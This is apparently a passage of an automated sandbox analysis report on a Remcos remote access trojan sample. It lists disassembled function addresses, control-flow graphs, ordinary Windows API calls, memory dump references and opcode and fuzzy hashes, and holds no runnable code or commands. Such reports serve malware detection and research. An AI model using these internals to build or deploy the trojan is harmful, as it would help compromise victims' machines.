                                                                                        • Instruction Fuzzy Hash: AED05BD128830215E5207AD9ACA2B2531544748754F10003BF504EB5D2C9B45C445D2D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040B690 Relevance: 3.0, APIs: 2, Instructions: 7COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 270 40b690-40b6a7 TlsFree * 2
                                                                                        APIs
                                                                                        • TlsFree.KERNEL32(00000002), ref: 0040B696
                                                                                        • TlsFree.KERNEL32(00000003,00000002), ref: 0040B6A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_400000_remcos.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free
                                                                                        • String ID:
                                                                                        • API String ID: 3978063606-0
                                                                                        • Opcode ID: 3e06fc8291d666770f48fa8e8f93397613ac60aaba26141da3769a3c70ca2c44
                                                                                        • Instruction ID: 8df01562e034ce22fd4737e3d0235d01311bdce1a80e99ef2c4830d54f200d36
                                                                                        • Opcode Fuzzy Hash: 3e06fc8291d666770f48fa8e8f93397613ac60aaba26141da3769a3c70ca2c44
                                                                                        • Instruction Fuzzy Hash: 07B092A511010256CA04A7B19CC98562228E688308790C82EB24093059C67D94498B9C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004068E0 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 402 4068e0-4068ef 403 4068f1-4068f9 call 406714 402->403 404 4068fb-406901 402->404 413 40695f-406963 403->413 406 406903 404->406 407 40690a-40690c 404->407 410 406905-406906 406->410 411 40690e-406913 406->411 408 406926-40694f call 406398 SetFilePointer 407->408 419 406951 call 406780 408->419 420 406956-40695d call 40642c 408->420 414 406915-40691a 410->414 415 406908-406924 call 406714 410->415 411->408 414->408 415->413 419->420 420->413
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_400000_remcos.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 22885c764dc56c8ec779784f715e58f1bd8632ba3d7bee4c65262596e3ad86b9
                                                                                        • Instruction ID: 36bbe8d657f6db26f82613ae88edee31248bdf0a01ec1da968d44b07d79e6300
                                                                                        • Opcode Fuzzy Hash: 22885c764dc56c8ec779784f715e58f1bd8632ba3d7bee4c65262596e3ad86b9
                                                                                        • Instruction Fuzzy Hash: FC012BB2244206ABD2007A69AD81B173719D781378F270437F10BBB9D5D83D98718A7D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004068C8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 434 4068c8-4068de GetFileType
                                                                                        APIs
                                                                                        • GetFileType.KERNEL32(0040B91F,?,00406B17,00000000,?,80000000,?,0000000C,00000005,00000000,00000000,?,0040B91F,0040B91F,?), ref: 004068CF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_400000_remcos.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileType
                                                                                        • String ID:
                                                                                        • API String ID: 3081899298-0
                                                                                        • Opcode ID: e8280bfe69d92a3191d9e07eae620084a41bec6694981ed4e50ef531fbd81db7
                                                                                        • Instruction ID: dcbc394d099bdc7e92124d93416773b1b72d6b7a627fadcab208d9a0e7743ad5
                                                                                        • Opcode Fuzzy Hash: e8280bfe69d92a3191d9e07eae620084a41bec6694981ed4e50ef531fbd81db7
                                                                                        • Instruction Fuzzy Hash: BFB0123B13470C12CF1065F9DC8784E778CE504654B084412F60DD7151C53DF58045FA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040A2F8 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 523 40a2f8-40a30f GlobalMemoryStatus
                                                                                        APIs
                                                                                        • GlobalMemoryStatus.KERNEL32 ref: 0040A303
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_400000_remcos.jbxd
                                                                                        Similarity
                                                                                        • API ID: GlobalMemoryStatus
                                                                                        • String ID:
                                                                                        • API String ID: 1890195054-0
                                                                                        • Opcode ID: e3e50156da86e08f653541cf25ac3880a16f36970765071494f88e758de8fc63
                                                                                        • Instruction ID: 291fe9440c50823d652b32dadfabf7e7faafa3e224446b663234e64ff786610d
                                                                                        • Opcode Fuzzy Hash: e3e50156da86e08f653541cf25ac3880a16f36970765071494f88e758de8fc63
                                                                                        • Instruction Fuzzy Hash: 7EB092304046016BD210AB198C42B1EB290EB84328F848658B4E8963C2D73D51648BCB
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406838 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,0040A949,00000000,?,?,?,?,?,?,0040B91F,Semaphore error ,?), ref: 00406861
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_400000_remcos.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle
                                                                                        • String ID:
                                                                                        • API String ID: 2962429428-0
                                                                                        • Opcode ID: 7ddf8c3f37879a89a01ab667404af04e87ab8d75908fe66d5f79a787db16d9e7
                                                                                        • Instruction ID: 2ef38db8701bb9f57f6a21072f90ea293e9d3e040f6251331b023ee53efe7aca
                                                                                        • Opcode Fuzzy Hash: 7ddf8c3f37879a89a01ab667404af04e87ab8d75908fe66d5f79a787db16d9e7
                                                                                        • Instruction Fuzzy Hash: 02F082B20042056AD544BF7EBCC250AB79EA74533CB61853BF50E661E2DA3B9470456C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406204 Relevance: .1, Instructions: 93COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_400000_remcos.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 920e49608f5476f7cb036848b3eb59b8c8bb8b50dc2d4abdda3700784f4818fe
                                                                                        • Instruction ID: 012b1cba98b561163b9537e3ede1ef39e67ca27ff2987c7cb9886a8fc19ff59f
                                                                                        • Opcode Fuzzy Hash: 920e49608f5476f7cb036848b3eb59b8c8bb8b50dc2d4abdda3700784f4818fe
                                                                                        • Instruction Fuzzy Hash: 8131DD71A00208ABCB10EFA4DCC1A9E7778AB45354F15867EFE166B2C4D634EE60C798
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404C74 Relevance: .1, Instructions: 64COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_400000_remcos.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 15e8eaaeba68c4e9ed6a8d1099968002b8932740a930359a3c50be1ad7d580c7
                                                                                        • Instruction ID: 96895996af8b0b7b9b3591e001f4e5e7da7c1998bd3071ae9e5a85faf54314be
                                                                                        • Opcode Fuzzy Hash: 15e8eaaeba68c4e9ed6a8d1099968002b8932740a930359a3c50be1ad7d580c7
                                                                                        • Instruction Fuzzy Hash: 2A11EBA150970055EB24DE7AA8C571367A89F81734F19857FFE18AB1C7DA7CC840876C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404EF4 Relevance: .1, Instructions: 62COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_400000_remcos.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 10e938a78869559e04645d44cea01b50ed6909e43cfa05fd7d44f3b954c789b3
                                                                                        • Instruction ID: a9bebe41e76461b2683e7cfd7b10f04a4ea299ec525170480f45c5dec160de02
                                                                                        • Opcode Fuzzy Hash: 10e938a78869559e04645d44cea01b50ed6909e43cfa05fd7d44f3b954c789b3
                                                                                        • Instruction Fuzzy Hash: 7711B9A15083456AEF08CFA4DC85B5737A49F85318F1405AEFE156E1D3EA38D61483AD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040AA04 Relevance: .0, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_400000_remcos.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f48ba592624ed506b3b18d8bf699ae0d9b3984c6abc41e4d3d6c72a9effb16a2
                                                                                        • Instruction ID: 61e506eba1d1ed5aca7a509081a7820ee266a28bfe0408c0d60a6e0b316bbde7
                                                                                        • Opcode Fuzzy Hash: f48ba592624ed506b3b18d8bf699ae0d9b3984c6abc41e4d3d6c72a9effb16a2
                                                                                        • Instruction Fuzzy Hash: 6EF01D302003059FCB20FB62EA9562A3364EB50318F10843BFD05766E38B79AD54CEAE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040AA78 Relevance: .0, Instructions: 10COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.2144913044.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000007.00000002.2144842702.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2144980511.000000000040D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                        • Associated: 00000007.00000002.2145031272.0000000000416000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_7_2_400000_remcos.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e53a84bc23d0da33ef9c993edaa77ada6801c4e5f7a11cab2167ccc072819253
                                                                                        • Instruction ID: c4a79ecf570a510c56288346833a2824924287a6aade0c15474c20e898d4e089
                                                                                        • Opcode Fuzzy Hash: e53a84bc23d0da33ef9c993edaa77ada6801c4e5f7a11cab2167ccc072819253
                                                                                        • Instruction Fuzzy Hash: 85B012B278430C37E60065C9AC03F6A338C5748F04F000021FF0C5E2C1E4A5B96085EB
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%